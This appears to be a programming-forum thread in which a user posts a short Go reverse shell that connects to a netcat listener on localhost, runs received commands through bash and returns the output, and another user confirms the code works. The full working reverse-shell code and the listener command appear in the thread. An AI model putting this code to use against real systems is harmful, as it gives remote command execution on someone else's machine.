Cybersecurity Testing

ipatchcables · April 26, 2019, 1:46pm

I’m building a reverse bash shell for educational purposes only. I have the following code but am getting an error with it. Any help would be greatly appreciated. I can also work via PMs. What am I missing?

//this is my first reverse shell written in go lang
package main

import (
	"bufio"
	"fmt"
	"log"
	"net"
	"os/exec"
)

func main() {
	shell("127.0.0.1:4444")
}

func shell(host string) {
	conn, err := net.Dial("tcp", host)
	if err != nil {
		log.Fatal(err)
	}

	for {
		message, _ := bufio.NewReader(conn).ReadString('\n')
		out, err := exec.Command("bash", "-c", message).CombinedOutput()
		if err != nil {
			fmt.Println(err)
		}
		conn.Write(out)
	}
}

The error:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x1067c00]

goroutine 1 [running]:
bufio.(*Reader).fill(0xc000050ed0)
	/usr/local/go/src/bufio/bufio.go:100 +0xe0
bufio.(*Reader).ReadSlice(0xc000050ed0, 0x129650a, 0x1154601, 0x101000000000001, 0x0, 0x1000, 0xc0000dc000)
	/usr/local/go/src/bufio/bufio.go:356 +0x3d
bufio.(*Reader).ReadBytes(0xc000050ed0, 0x100a, 0x1000, 0xc0000dc000, 0x0, 0x113046f, 0xe)
	/usr/local/go/src/bufio/bufio.go:434 +0x70
bufio.(*Reader).ReadString(...)
	/usr/local/go/src/bufio/bufio.go:474
main.main()
	/Path/to/main.go:15 +0x1fb
exit status 2

lutzhorn · April 26, 2019, 1:50pm

What is a

supposed to do? What kind of application is listeing on port 4444?

ipatchcables · April 26, 2019, 1:55pm

The application listening on 4444 is netcat. Here is a link to what it does: https://en.wikipedia.org/wiki/Netcat

lutzhorn · April 26, 2019, 2:03pm

OK. Not that your question is complete, let me try to reproduce your problem.

In shell 1:

$ netcat -l -k localhost 4444

In shell 2:

$ go run main.go # your code

Back in shell 1:

date
Fr 26. Apr 16:01:58 CEST 2019

Works nice.

ipatchcables · April 26, 2019, 2:06pm

Oh, are you saying the code is working for you?

lutzhorn · April 26, 2019, 2:07pm

Yes, it works.

I can not reproduce your problem.

ipatchcables · April 26, 2019, 2:09pm

Interesting, thank you. How do you handle testing environmental variables outside of your code? I’m running this code on the same box and the testing box… maybe that is why? Thank you for your time!

lutzhorn · April 26, 2019, 2:19pm

What do you mean by this?

Do you use any environment variables with this short program? How?

ipatchcables · April 26, 2019, 2:20pm

Disregard that last statement. Thank you again.